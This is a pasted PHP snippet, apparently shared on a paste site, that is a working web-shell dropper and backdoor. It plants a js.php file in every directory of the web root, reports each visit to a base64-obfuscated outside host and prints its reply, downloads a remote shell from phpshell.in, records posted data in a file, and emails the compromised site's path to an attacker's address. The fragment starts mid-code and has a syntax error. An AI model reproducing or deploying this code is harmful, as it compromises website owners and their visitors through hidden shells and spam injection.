- $doc = $_SERVER["DOCUMENT_ROOT"];
- $dir = scandir($doc);
- $d1 = ''.$doc.'/.';
- $d2 = ''.$doc.'/..';
- if(($key = @array_search(, $dir)) !== false) {
- unset($dir[$key]);
- }
- if(($key = @array_search('..', $dir)) !== false) {
- unset($dir[$key]);
- }
- if(($key = @array_search($d1, $dir)) !== false) {
- unset($dir[$key]);
- }
- if(($key = array_search($d2, $dir)) !== false) {
- unset($dir[$key]);
- }
- @array_push($dir,$doc);
- foreach($dir as $d){
- $p = $doc."/".$d;
- if(is_dir($p)){
- $file = $p."/js.php";
- @touch($file);
- $folder = @fopen($file,"w");
- @fwrite($folder,$a);
- }
- }
- $lls = $_SERVER["HTTP_HOST"];
- $llc = $_SERVER["REQUEST_URI"];
- $lld = 'http://'.$lls.''.$llc.'';
- $brow = urlencode($_SERVER['HTTP_USER_AGENT']);
- $retValue = file_get_contents(base64_decode("aHR0cDovL2J5cjAwdC5jby9sLQ==")."=".$lld.base64_decode("JmI=")."=".$brow);
- echo $retValue;
- @$_SESSION["sdm"]=1;
- }
- if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query']));
- $data = "data.txt";
- @touch ("data.txt");
- $ver = @fopen ($data , 'w');
- @fwrite ( $ver , $veriyfy ) ;
- @fclose ($ver);
- }else{ $datas=@fopen("data.txt",'r');
- $i=0;
- while ($i <= 5) { $i++;
- $blue=@fgets($datas,1024);
- echo $blue;
- } } $datasi=@fopen("js/js.php",'r');
- if($datasi){ }else{ @mkdir("js");
- $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");
- $data = "js/js.php";
- @touch ("js/js.php");
- $ver = @fopen ($data , 'w');
- @fwrite ( $ver , $dos ) ;
- @fclose ($ver);
- $yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."";
- $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : js/js.php</h1>';
- $header .= "From: SheLL Boot <suppor@nic.org>\n";
- $header .= "Content-Type: text/html;
- charset=utf-8\n";
- @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);
- @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);
- }</div></body></html>
Add Comment
Please, Sign In to add comment